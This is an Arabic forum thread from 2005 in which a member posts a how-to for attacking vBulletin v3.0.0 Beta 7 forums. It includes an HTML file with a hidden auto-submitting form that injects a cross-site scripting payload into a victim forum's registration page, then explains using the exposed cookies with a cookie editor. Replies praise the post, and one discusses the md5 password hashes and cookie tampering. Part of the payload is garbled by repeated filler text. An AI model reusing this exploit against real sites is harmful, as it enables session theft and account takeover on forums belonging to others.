للتسجيل
 
 

العودة   منتديات الحمادين > المنتديات التقنية > منتدى الكمبيوتر والأنترنت
تحديث الصفحة ثغرة فى منتديات vb
التسجيل تعليمات قائمة الأعضاء التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة

منتدى الكمبيوتر والأنترنت جميع البرامج الجديده وحلول المشاكل تجدها هنا

الإهداءات
مستــأإنسيـــن اليوم 05:37 AM
عند قبـره تراني حاجزلي محلي ************ أدفنوني وغطوني بتالي ترابه

منقوز جرره اليوم 05:03 AM
إبــــتـــلــشـــــنا بالــلـــــــي عـــنـــــدهــــم نــقــــص بـــالـــحـــنـــان هههههههههههههههه

مستــأإنسيـــن اليوم 04:46 AM
غايتــــي ومنـــاي باالدنيا رضاك ******** لو يقولون العرب صابه جنون **************************** مــــــستـانـسكـو و و

لامبارد اليوم 04:35 AM
السفيه يبقى طووول عمره سفيه *** ربي لا تؤااخذناا بمااا فعل السفهاااء مناااا************

منقوز جرره اليوم 03:43 AM
مــــــــــــــــــــــرررررحبــــــــــــــــــــــــــــــــــــــــــــــــــــــ وين الاستايل ـــــــــــــــــــااااااااااا

ريوف اليوم 12:59 AM
يقولون يغارطيب منه وانا اقول الطيب حقه مخلاب امره عجيب والعجب كرم ابوه وجده

شقران يوم أمس 11:16 PM
مبروك الأوسمه يستاهلون الطيب بس ياشباب وين المفاطيح والعشيات ****اذا الميزانيه ماتسمح على الأقل شورما ونحلي بدونت مو مشكله

ضياء الفيض يوم أمس 10:11 PM
مساء الخير لكل العضاء وتمنى منك الدعااء لنادي النصر بالفوز

آورنس يوم أمس 08:23 PM
ياصغيـر مايكبـرنـي لـقـب**ومايصغرني اذا انكرني صغيـر |-| ماخذينا الصيت من جمع الذهـب**ولانسابه شيخ او قربـة وزيـر|-| نلتقي لنرتقي ****عدد الاعضاء لهاذا الوقت 10,817 نلتقي لنرتقي****آورنس

آورنس يوم أمس 04:58 PM
حي الله إلي با لحلى ما كل الجو *** غطى على كل الحضور بجماله>> ضياء الفيض ******** ارحب طال عمرك ياهلا وياغلا فيك ******** تحياتتي آورنـــــــــــس
إضافة إهداء

إضافة رد
 
أدوات الموضوع إبحث في الموضوع
  #1  
قديم 19-Mar-2005, 05:23 PM
islamm2003 islamm2003 غير متصل
[ جـديــد ]
  
تاريخ التسجيل: Mar 2005
العمر: 26
المشاركات: 13
ثغرة فى منتديات vb
بسم الله الحمن الرحيم
--------------------------------
الكاتب :islamm2003
الحقوق محفوظه للكاتب islamm203
--------------------------
الثغره موجوده في منتديات vBulletin v3.0.0 Beta 7 والكثير من المنتديات مصابه
--------------------------------
اول شئ روح لموقع البحث مثل
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]


ابحث عن هذه الكلمه
vBulletin v3.0.0 Beta 7



----------------------------------------------
خود هذه الكود وضعه في المفكره Notepad وحفظه بمنداد html



كود:


كود:
<form action="http://[VICTIM - FORUM PATH]/register.php?do=register"
method="post" style="display:none">
<input type="hidden" name="s" value="" />
<input type="hidden" name="regtype" value="1" />
<input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" />
<input type="hidden" name="url" value="index.php" />
<input type="hidden" name="do" value="addmember" /> </form> <script>
//Code that will be executed
var xss = "\"><script>alert(document"+".ابو عمرابو عمرابو عمرابو عمرابو عمرابو عمر)<\/script>";
document.forms(0).field1.value=xss;
document.forms(0).submit();
</script>
---------------------------------------------------------------

مثل هذه الموقع مصاب بالثغره
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

غير في الكود [VICTIM - FORUM PATH]/ الي المنتديات المصابه



احفظ الملف بمتداد html


------------------------------------------------
افتح ملف الهوتمل هيظهر ليك الكوكيز للـ المنتدي المصاب الان



الان انت عارف الباقي عن طريق برنامج ابو عمرابو عمرابو عمرابو عمرابو عمرابو عمر Editor واكيد استخدمته في ثغره last10.php

تحياتي
رد مع اقتباس
  #2  
قديم 20-Mar-2005, 03:19 AM
الصورة الرمزية الدويله
الدويله الدويله غير متصل
[ مـتـمـيـز ]
  
تاريخ التسجيل: Mar 2005
الدولة: حيث ماكنت أكون
العمر: 26
المشاركات: 426
اخوي islamm2003 بارك الله فيك وماقصرت

مجهود تشكر عليه بصراحه

لا شلت يمينك اخي

مواضيعك متميزه دائما كتميز صاحبها

ننتظر المزيد
رد مع اقتباس
  #3  
قديم 13-Apr-2005, 04:19 PM
ابو سارة ابو سارة غير متصل
مشرف المنتديات العامه
  
تاريخ التسجيل: Apr 2005
العمر: 29
المشاركات: 177
مشاركة: ثغرة فى منتديات vb
islamm2003


يعطيك العافيه اخوي وماقصرت

ومجهود رائع
__________________
[poem font="Simplified Arabic,4,blue,normal,normal" bkcolor="transparent" bkimage="backgrounds/20.gif" border="double,7,darkblue" type=0 line=0 align=center use=ex num="0,black"]
من يجهل أسلوب المكر عاش محتار= ومن يلبس ثياب الكبر مات عـاري
والدمعه اللي تحتري حزن الأعـذار= ماظنها تنفـع ضعيـف المـواري
ماللصقر حشمـه وقيمـه ومقـدار= أن كان مايدمي صـدور الحبـاري[/poem]
رد مع اقتباس
  #4  
قديم 20-Apr-2005, 03:13 PM
الخـارج عن القـانون الخـارج عن القـانون غير متصل
[ فـعـال ]
  
تاريخ التسجيل: Apr 2005
الدولة: تورا بورا
العمر: 29
المشاركات: 148
مشاركة: ثغرة فى منتديات vb
اخوي اسلام ما قصرت ويعطيك العافيه.... بس الثغره قديمه شوي :) وغير كذا للأسف الباس ورد اللي تنتج عن هذي الثغره هي باس ورد مشفره تشفير md5 والمصيبه العضما انها تختلف عن تشفير الجيل الثاني للمنتديات المصابه هذا النوع اللي هو الجيل الثالث مشفر تشفير md5 معقد ومضيوف عليه خانتين وهميات يعني مشفر مرتين الشي اللي يجعل فكه مستحيل اذاً الحل هنا هو معدل الكوكيز وهذا ايضاً ما ينفع مع التشفير مرتني للجيل الثالث فهوه يتخدم نضام اخر زيارة.... على العموم انت ما قصرت ويعطيك العافيه ومشكورررر :)
رد مع اقتباس
  #5  
قديم 08-Aug-2008, 07:59 AM
الصورة الرمزية ريوف
ريوف ريوف غير متصل
مشرفة الحوار العام والاتجاه المعاكس
  
تاريخ التسجيل: Jun 2008
المشاركات: 10,761
رد: ثغرة فى منتديات vb
يعطيك العافيه
رد مع اقتباس
إضافة رد

« المتصفح Firefox الرائع | حمل انترنت اكسبلورر 7 << لن تندم »

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع إبحث في الموضوع
إبحث في الموضوع:

البحث المتقدم

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة

Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd diamond
--:: تصميم عبادى نت للتصميم والإستضافة ::--
الحقوق محفوظة

SEO by bdr130.net 3.0.0